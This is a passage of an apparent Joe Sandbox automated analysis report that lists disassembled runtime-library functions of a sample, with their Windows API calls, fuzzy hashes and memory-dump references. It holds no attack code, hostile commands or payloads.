                                                                                    • Opcode Fuzzy Hash: ba7c3ce583243b6c21b3dea586276b9e7654e419200a6de5068a19ef981c24d7
                                                                                    • Instruction Fuzzy Hash: FA11A130910324EBDF205F64E804AAA37A9FB42361F1C8929F75AC5290D7BCDE44DB61
                                                                                    Function 0074AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00743F73,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue), ref: 0074AD66
                                                                                    • GetLastError.KERNEL32(?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000,00000364,?,007498B7), ref: 0074AD72
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000), ref: 0074AD80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 1124e875b517efe459e512336f7b2256bbaa54a9b37c506ad4a7c371ad2988e6
                                                                                    • Instruction ID: 59d2eaa357bbebc2975bd999039dde6b4b0319591fb33787e0ba8f78740fdf41
                                                                                    • Opcode Fuzzy Hash: 1124e875b517efe459e512336f7b2256bbaa54a9b37c506ad4a7c371ad2988e6
                                                                                    • Instruction Fuzzy Hash: F4014732B81322BBC7224A689C44A977B58EF057B3B214220F816D76A4D72CC801CEE5
                                                                                    Function 0074BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007497E5: GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                      • Part of subcall function 007497E5: _free.LIBCMT ref: 0074981C
                                                                                      • Part of subcall function 007497E5: SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                      • Part of subcall function 007497E5: _abort.LIBCMT ref: 00749863
                                                                                      • Part of subcall function 0074BB4E: _abort.LIBCMT ref: 0074BB80
                                                                                      • Part of subcall function 0074BB4E: _free.LIBCMT ref: 0074BBB4
                                                                                      • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                    • _free.LIBCMT ref: 0074BA9F
                                                                                    • _free.LIBCMT ref: 0074BAD5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast_abort
                                                                                    • String ID: pu
                                                                                    • API String ID: 2991157371-250260183
                                                                                    • Opcode ID: ba1571174276ec53c009dedb29d10cea0420908e205153492ba3cd797a8e64ac
                                                                                    • Instruction ID: cfb9399e4d8e20f99b5139816d8264b8a6e4398f5f53c066edaadf546eec4a38
                                                                                    • Opcode Fuzzy Hash: ba1571174276ec53c009dedb29d10cea0420908e205153492ba3cd797a8e64ac
                                                                                    • Instruction Fuzzy Hash: 40310B31A04209EFDB14DFA8D845BAD77F5EF41320F218499E9149B2A2EB7ADE40DB50
                                                                                    Function 00748268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0074BF30: GetEnvironmentStringsW.KERNEL32 ref: 0074BF39
                                                                                      • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074BF5C
                                                                                      • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074BF82
                                                                                      • Part of subcall function 0074BF30: _free.LIBCMT ref: 0074BF95
                                                                                      • Part of subcall function 0074BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074BFA4
                                                                                    • _free.LIBCMT ref: 007482AE
                                                                                    • _free.LIBCMT ref: 007482B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                    • String ID: 0"x
                                                                                    • API String ID: 400815659-575046572
                                                                                    • Opcode ID: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
                                                                                    • Instruction ID: 1f5f410fc78f00ec7d8363e5c4a4ce0d6744abc99434c38bd5af54256bcf67f6
                                                                                    • Opcode Fuzzy Hash: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
                                                                                    • Instruction Fuzzy Hash: 43E02B33B0AD46D192E132792C0E62F0640AFC5339B150326F910CB0D3CF9C880749E7
                                                                                    Function 0073E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 2s$PDu<s
                                                                                    • API String ID: 1269201914-970619881
                                                                                    • Opcode ID: 31c2ac2618cdd501737a70046d6b87e640ce86c0a122f6fa52110fc84f1a8931
                                                                                    • Instruction ID: 404acd75d1b5149ccec74ce83a993814fd043e799aaaf8cd7df92e79f0e8113f
                                                                                    • Opcode Fuzzy Hash: 31c2ac2618cdd501737a70046d6b87e640ce86c0a122f6fa52110fc84f1a8931
                                                                                    • Instruction Fuzzy Hash: 6FB012C1698140FD3104610C1C06E7F011DC0C1F15730503EF804C00C2E88C0D440531
                                                                                    Function 0073E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: (s$PDu<s
                                                                                    • API String ID: 1269201914-480722381
                                                                                    • Opcode ID: b3b25e7a0d33dc90f3c9ccd5f0ae6a924871cc089e398d779239bd9a1f222228
                                                                                    • Instruction ID: 8c3f68ee1192d28e84e4889f7785a324503899e73897345fa36affa9fc99bde5
                                                                                    • Opcode Fuzzy Hash: b3b25e7a0d33dc90f3c9ccd5f0ae6a924871cc089e398d779239bd9a1f222228
                                                                                    • Instruction Fuzzy Hash: C0B012C1698180FC3104610C1D06D7F051DC0C1F15730903EF804C41C2E88C0D450531
                                                                                    Function 00729F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0072D343,00000001,?,?,?,00000000,0073551D,?,?,?), ref: 00729F9E
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0073551D,?,?,?,?,?,00734FC7,?), ref: 00729FE5
                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0072D343,00000001,?,?), ref: 0072A011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    • Opcode ID: aca1382566d0989580b2cfa07089b79aff225f875697b4f0d68699021ae4e6a7
                                                                                    • Instruction ID: 46c150bdda7b7cf7929623cd94886d940c2c756e5fd408c3845fee3693d7e2ac
                                                                                    • Opcode Fuzzy Hash: aca1382566d0989580b2cfa07089b79aff225f875697b4f0d68699021ae4e6a7
                                                                                    • Instruction Fuzzy Hash: 5331F531204325AFDB24CF20E918BAEB7A5FF84711F04491DF945972D0D779AD48CBA2
                                                                                    Function 0072A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0072C27E: _wcslen.LIBCMT ref: 0072C284
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A2D9
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A30C
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2260680371-0
                                                                                    • Opcode ID: 1c27ad1e6ea425b159e45b4de31e82ce5d8476e14f0cc2eb1353eb6af16f310c
                                                                                    • Instruction ID: d988740ed4147f4d3f7a55bc1516873b143104bc78932567a80fe9c76939ddc8
                                                                                    • Opcode Fuzzy Hash: 1c27ad1e6ea425b159e45b4de31e82ce5d8476e14f0cc2eb1353eb6af16f310c
                                                                                    • Instruction Fuzzy Hash: 91019E21600370BBEF21EA756C09BEE2388AF0A781F044454F901E6092EB6CDA8186B6
                                                                                    Function 0074B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0074B8B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-3916222277
                                                                                    • Opcode ID: 9e99bfa672472cea4c1ba4c67dc1032be76dc0acf5b5420b44fbf8b0f87598e1
                                                                                    • Instruction ID: 06c1d71436392f7e9da060732aff4b4c16c8b0011b2980c483bd48c4042029b9
                                                                                    • Opcode Fuzzy Hash: 9e99bfa672472cea4c1ba4c67dc1032be76dc0acf5b5420b44fbf8b0f87598e1
                                                                                    • Instruction Fuzzy Hash: 2441C6B050438CEADB218E688C84BF6BBADEB55304F1444EDE6DA86142D379EE45DB60
                                                                                    Function 0074AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0074AFDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: LCMapStringEx
                                                                                    • API String ID: 2568140703-3893581201
                                                                                    • Opcode ID: 09417285b0b741213c895c428b368a16898a2cfc2847a0a6dc98a353a8ee612c
                                                                                    • Instruction ID: bb8831003323c6f2049a844128d3f3e30ee49e0ec248d146d55ca200afe2e3a7
                                                                                    • Opcode Fuzzy Hash: 09417285b0b741213c895c428b368a16898a2cfc2847a0a6dc98a353a8ee612c
                                                                                    • Instruction Fuzzy Hash: 8B011372544209BBCF069F90EC06DEE7F66EB08751F018154FE1826160CB7A9A31EB95
                                                                                    Function 0074AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0074A56F), ref: 0074AF55
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3084827643
                                                                                    • Opcode ID: 1e28edfeee873940bb71a00b3cf974a758802b1006370424ade05f511de9a33e
                                                                                    • Instruction ID: a50748f29676eec84dbd411a1d9afcea7893668f506824c6fec97f595b5aaa3c
                                                                                    • Opcode Fuzzy Hash: 1e28edfeee873940bb71a00b3cf974a758802b1006370424ade05f511de9a33e
                                                                                    • Instruction Fuzzy Hash: 3AF0B471685208FBCF065F60DC06CDDBF61EF04752B008054FD0856260DFB9AE14DBA9
                                                                                    Function 0074ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2773662609-671089009
                                                                                    • Opcode ID: f44fe8f24e4a944cde1a02fa62c3e7a1b3e77b20200fa40d669f88a4e9fadf09
                                                                                    • Instruction ID: 64bd5ed12231200b87735bb597ace6458e2c88f2b98624fd3c04695598131e49
                                                                                    • Opcode Fuzzy Hash: f44fe8f24e4a944cde1a02fa62c3e7a1b3e77b20200fa40d669f88a4e9fadf09
                                                                                    • Instruction Fuzzy Hash: ABE05C70F80308B7C2059B24DC07DEEB754DB04723B000054FC0053250CFBC6E0086E9
                                                                                    Function 0073E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 7b4425b3ef78096f697e10aea6d54999fc05efa2f580270712bd81530fdb5b3b
                                                                                    • Instruction ID: 3a86e36fe59961287415a49ab42a24efb5e8df2955aa2a751c40fde0f559d0e8
                                                                                    • Opcode Fuzzy Hash: 7b4425b3ef78096f697e10aea6d54999fc05efa2f580270712bd81530fdb5b3b
                                                                                    • Instruction Fuzzy Hash: 82B012D2698104EC3104624D1C0AD77010CC0C1F11730C03FFC05C01C2E88CAC080531
                                                                                    Function 0073E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
